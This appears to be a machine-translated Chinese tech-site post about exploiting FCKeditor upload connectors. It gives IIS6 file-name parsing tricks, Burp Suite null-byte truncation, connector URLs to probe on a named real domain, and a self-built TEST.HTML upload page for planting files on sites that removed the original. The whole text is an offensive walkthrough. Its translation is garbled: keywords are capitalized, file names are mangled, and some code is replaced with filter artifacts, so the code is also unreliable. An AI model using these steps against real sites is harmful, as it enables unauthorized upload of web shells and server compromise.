Shulou(Shulou.com)06/01 Report--

Look at the version first.

If it is iis6.0 uploading 1.aspboar.jpg twice or by creating a 1.asp directory (there is a way to try to change the breakthrough point to underline)

Or upload 1.aspscape jpg directly.

If iis6.0 doesn't use burpsuite to intercept packets

Picture

Upload 1.aspscape jpg uses burpsuite to change the semicolon into a space and then change the corresponding hex 20 to 00 to save twice using the truncated semicolon

If the uploaded test page is deleted

Http://www.xxxx.com/fckeditor/editor/filemanager/browser/default/connectors/test.html

Http://www.xxxx.com/fckeditor/editor/filemanager/browser/default/connectors/uploadtest.html

First, take a look at this page of the website.

Http://www.keio.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspx

Http://www.keio.com/fckeditor/editor/filemanager/connectors/asp/connector.asp

Http://www.keio.com/fckeditor/editor/filemanager/connectors/php/connector.php

Http://www.keio.com/fckeditor/editor/filemanager/connectors/jsp/connector.jsp

Does this page exist?

There is a locally constructed test page to modify the following code to the address of the target

Fckeditor local construction TEST.HTML upload

Since the previous explosion of TEST.HTML upload 0day, many webmasters have deleted TEST.HTML. It's uploaded.

The file was not deleted. In this way, you can construct one by yourself.

Just save the following code as TEST.HTML. Then modify the uploaded file inside.

FCKeditor-Connectors Tests

Function BuildBaseUrl (command)

{

Var sUrl =

Document.getElementById ('cmbConnector'). Value +

'? Command=' + command +

'& Type=' + document.getElementById (' cmbType'). Value +

'& CurrentFolder=' + encodeURIComponent (document.getElementById (' txtFolder') .value)

Return sUrl

}

Function SetFrameUrl (url)

{

Document.getElementById ('eRunningFrame'). Src = url

Document.getElementById ('eUrl') [xss_clean] = url

}

Function GetFolders ()

{

SetFrameUrl (BuildBaseUrl ('GetFolders'))

Return false

}

Function GetFoldersAndFiles ()

{

SetFrameUrl (BuildBaseUrl ('GetFoldersAndFiles'))

Return false

}

Function CreateFolder ()

{

Var sFolder = prompt ('Type the folder name:',' Test Folder')

If (! SFolder)

Return false

Var sUrl = BuildBaseUrl ('CreateFolder')

SUrl + ='& NewFolderName=' + encodeURIComponent (sFolder)

SetFrameUrl (sUrl)

Return false

}

Function OnUploadCompleted (errorNumber, fileName)

{

Switch (errorNumber)

{

Case 0:

Alert ('File uploaded with no errors')

Break

Case 201:

GetFoldersAndFiles ()

Alert ('A file with the same name is already available. The uploaded file has been renamed to "'+ fileName +'"')

Break

Case 202:

Alert ('Invalid file')

Break

Default:

Alert ('Error on file upload. Error number:' + errorNumber)

Break

}

}

This.frames.frmUpload = this

Function SetAction ()

{

Var sUrl = BuildBaseUrl ('FileUpload')

Document.getElementById ('eUrl') [xss_clean] = sUrl

Document.getElementById ('frmUpload'). Action = sUrl

}

Connector:

ASP

ASP.Net

ColdFusion

Lasso

Perl

PHP

Python

Current Folder

Resource Type

File

Image

Flash

Media

Invalid Type (for testing)

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.